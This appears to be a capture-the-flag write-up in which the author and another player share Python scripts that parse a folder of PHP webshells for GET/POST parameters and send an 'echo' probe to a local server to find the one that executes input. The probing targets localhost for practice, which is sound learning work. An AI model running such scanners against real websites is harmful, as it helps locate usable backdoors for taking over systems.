Following the challenge prompt, download the source code from url/www.tar.gz. Open a few of the files and take a look: the directory is full of webshells, but almost all of them are unusable, and the task is to find one that actually works. The challenge seems to be testing whether you can script this, so I wrote my own scanner (Python 3):
import os
import re
import requests
from multiprocessing import Pool

filePath = r"E:\phpstudy_pro\WWW\src"
url = "http://127.0.0.1:8003/"
shell = "echo 'this is';"

# List every file in the source directory
def readFileName():
    return os.listdir(filePath)

# Extract the GET and POST parameter names used by one file
def getReq(fileName):
    f = os.path.join(filePath, fileName)
    with open(f, 'r', errors='ignore') as file:
        file_data = file.read()
    # GET parameters
    rpGet = re.findall(r"_GET\['(.*?)'", file_data)
    # POST parameters
    rpPost = re.findall(r"_POST\['(.*?)'", file_data)
    # verify each candidate parameter with a real request
    isSuccess(fileName, gets=rpGet, posts=rpPost)

def isSuccess(fileName, gets, posts):
    target = url + fileName  # use a local name so the global url is not shadowed
    print(fileName)
    # threads could be started here to speed this up
    for get in gets:
        if sendGet(get, target):
            print(fileName + " " + get + " yes")
    # for post in posts:
    #     if sendPost(post, target):
    #         print(fileName + " " + post + " yes")

def sendGet(get, target):
    # pass the payload via params so it is URL-encoded
    response = requests.get(target, params={get: shell})
    if "this is" in response.text:
        print(response.url)
        return True
    return False

def sendPost(post, target):
    data = {post: shell}
    response = requests.post(target, data=data)
    if "this is" in response.text:
        print(target)
        return True
    return False

if __name__ == '__main__':
    print("----start----")
    pool = Pool(10)
    pool.map(getReq, readFileName())
    pool.close()  # close the pool; it accepts no new tasks after this
    pool.join()   # wait for every worker to finish; must come after close()
    print("-----end-----")
My own script never finished and I'm not sure why, and I can't use what I don't understand. I suspect it's my machine, though: with only 3 worker processes the CPU was already at 100%. I had planned to put the POST-parameter requests on threads as well, which should make it quite a bit faster, but for now it performs about the same.
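Roughly what I had in mind for the threading, as a minimal sketch only (it reuses url, sendGet and sendPost from the script above and is not something I actually ran):

from concurrent.futures import ThreadPoolExecutor

# Sketch: fan the per-parameter requests for one file out over a small
# thread pool. Assumes url, sendGet and sendPost from the script above.
def isSuccess(fileName, gets, posts):
    target = url + fileName
    with ThreadPoolExecutor(max_workers=5) as ex:
        get_hits = list(ex.map(lambda g: (g, sendGet(g, target)), gets))
        post_hits = list(ex.map(lambda p: (p, sendPost(p, target)), posts))
    for name, ok in get_hits + post_hits:
        if ok:
            print(fileName + " " + name + " yes")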
The result definitely can come out, though; the files the scan did turn up I checked by hand with the shell directly.
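Checking a hit by hand is just one more request with the probe payload. The file name check.php and parameter cmd below are made up, stand-ins for whatever the scan reports:

import requests

# Hypothetical example: check.php and cmd are placeholders for the
# file/parameter pair that the scan flags as usable.
r = requests.get("http://127.0.0.1:8003/check.php", params={"cmd": "echo 'this is';"})
print("this is" in r.text)  # True means the shell evaluated our input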
Here is the script shared by a more experienced player (Python 2):
import os
import requests
from multiprocessing import Pool

path = "I:/phpStudy/PHPTutorial/WWW/src/"
files = os.listdir(path)
url = "http://localhost/src/"

def extract(f):
    # collect every $_GET['...'] parameter name found in the file
    gets = []
    with open(path + f, 'r') as fp:
        lines = [i.strip() for i in fp.readlines()]
    for line in lines:
        if line.find("$_GET['") != -1:  # -1 means not found; 0 is a valid hit
            start_pos = line.find("$_GET['") + len("$_GET['")
            end_pos = line.find("'", start_pos)
            gets.append(line[start_pos:end_pos])
    return gets

def exp(start, end):
    # probe the slice files[start:end] assigned to this worker
    for i in range(start, end):
        filename = files[i]
        gets = extract(filename)
        print "try: %s" % filename
        for get in gets:
            new_url = "%s%s?%s=%s" % (url, filename, get, 'echo "got it"')
            r = requests.get(new_url)
            if 'got it' in r.content:
                print new_url
                break

def main():
    pool = Pool(processes=15)
    step = len(files) / 15 or 1
    for i in range(0, len(files), step):
        # each worker probes one contiguous slice of the file list
        pool.apply_async(exp, (i, min(i + step, len(files))))
    pool.close()
    pool.join()

if __name__ == "__main__":
    main()
Although my own script never fully finished in the end, I still learned a lot: two days spent on Python crawlers, writing a simple spider, reading up on regular expressions, and working with process pools. Worth it.
Keep at it!